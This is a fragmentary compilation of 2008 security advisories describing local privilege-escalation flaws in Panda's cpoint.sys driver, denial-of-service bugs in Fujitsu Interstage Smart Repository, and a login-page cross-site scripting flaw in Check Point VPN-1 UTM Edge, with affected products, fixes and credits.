Tobias Klein has reported some vulnerabilities in Panda products, which can be exploited by malicious, local users to cause a DoS (Denial of Service) or gain escalated privileges.

Input validation errors in the cpoint.sys driver when handling certain IOCTL requests (e.g.

The vulnerabilities affect the following products:
* Panda Internet Security 2008
* Panda Antivirus + Firewall 2008
SOLUTION:
Apply hotfix.

Panda Internet Security 2008 (hfp120801s1.exe):
http://www.pandasecurity.com/resources/sop/Platinum2008/hfp120801s1.exe

Panda Antivirus + Firewall 2008 (hft70801s1.exe):
http://www.pandasecurity.com/resources/sop/PAVF08/hft70801s1.exe
PROVIDED AND/OR DISCOVERED BY: Tobias Klein
ORIGINAL ADVISORY:
Panda:
http://www.pandasecurity.com/homeusers/support/card?id=41337&idIdioma=2&ref=ProdExp
http://www.pandasecurity.com/homeusers/support/card?id=41231&idIdioma=2&ref=ProdExp
http://www.trapkit.de/advisories/TKADV2008-001.txt
----------------------------------------------------------------------
VAR-200803-0187 CVE-2008-1207 Fujitsu Interstage Smart Repository denial of service (DoS) vulnerabilities CVSS V2: 5.0
CVSS V3: -
Severity: MEDIUM
Multiple unspecified vulnerabilities in Fujitsu Interstage Smart Repository, as used in multiple Fujitsu Interstage products, allow remote attackers to cause a denial of service (daemon crash) via (1) an invalid request or (2) a large amount of data sent to the registered attribute value. Fujitsu Interstage Smart Repository, as used in Fujitsu Interstage products, contains a vulnerability that results in a denial of service (daemon crash); a third party may be able to put the daemon into a crashed state. Remote attackers can exploit these issues to deny service to legitimate users. Currently, very little is known about these issues. We will update this BID as more information emerges.
----------------------------------------------------------------------
TITLE: Fujitsu Interstage Smart Repository Denial of Service Vulnerabilities
SECUNIA ADVISORY ID: SA29250
VERIFY ADVISORY: http://secunia.com/advisories/29250/
CRITICAL: Less critical
IMPACT: DoS
WHERE: From local network
SOFTWARE:
Interstage Job Workload Server 8.x
http://secunia.com/product/13686/
Interstage Apworks 8.x
http://secunia.com/product/15987/
Interstage Apworks 7.x
http://secunia.com/product/13689/
Interstage Application Server 8.x
http://secunia.com/product/13685/
Interstage Application Server 7.x
http://secunia.com/product/13692/
Interstage Business Application Server 8.x
http://secunia.com/product/13687/
DESCRIPTION:
Some vulnerabilities have been reported in various Fujitsu products, which can be exploited by malicious people to cause a DoS (Denial of Service).

sending incorrect requests or sending overly large data.

Please see the vendor's advisory for a list of affected products and versions.
SOLUTION: Please see the vendor's advisory for patch details.
PROVIDED AND/OR DISCOVERED BY: Reported by the vendor.
ORIGINAL ADVISORY:
http://www.fujitsu.com/global/support/software/security/products-f/interstage-sr-200801e.html
http://www.fujitsu.com/global/support/software/security/products-f/interstage-sr-200802e.html
----------------------------------------------------------------------
VAR-200803-0188 CVE-2008-1208 Check Point VPN-1 UTM Edge W Embedded NGX login page cross-site scripting vulnerability CVSS V2: 4.3
CVSS V3: -
Severity: MEDIUM
Cross-site scripting (XSS) vulnerability in the login page in Check Point VPN-1 UTM Edge W Embedded NGX 7.0.48x allows remote attackers to inject arbitrary web script or HTML via the user parameter. An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks. The issue affects Check Point VPN-1 UTM Edge firmware 7.0.48x.
----------------------------------------------------------------------
Input passed to the "user" parameter in the login page is not properly sanitised before being returned to the user.

Other versions may also be affected.
SOLUTION: Update to firmware version 7.5.48.
PROVIDED AND/OR DISCOVERED BY: Henri Lindberg, Louhi Networks
ORIGINAL ADVISORY: http://www.louhi.fi/advisory/checkpoint_080306.txt
----------------------------------------------------------------------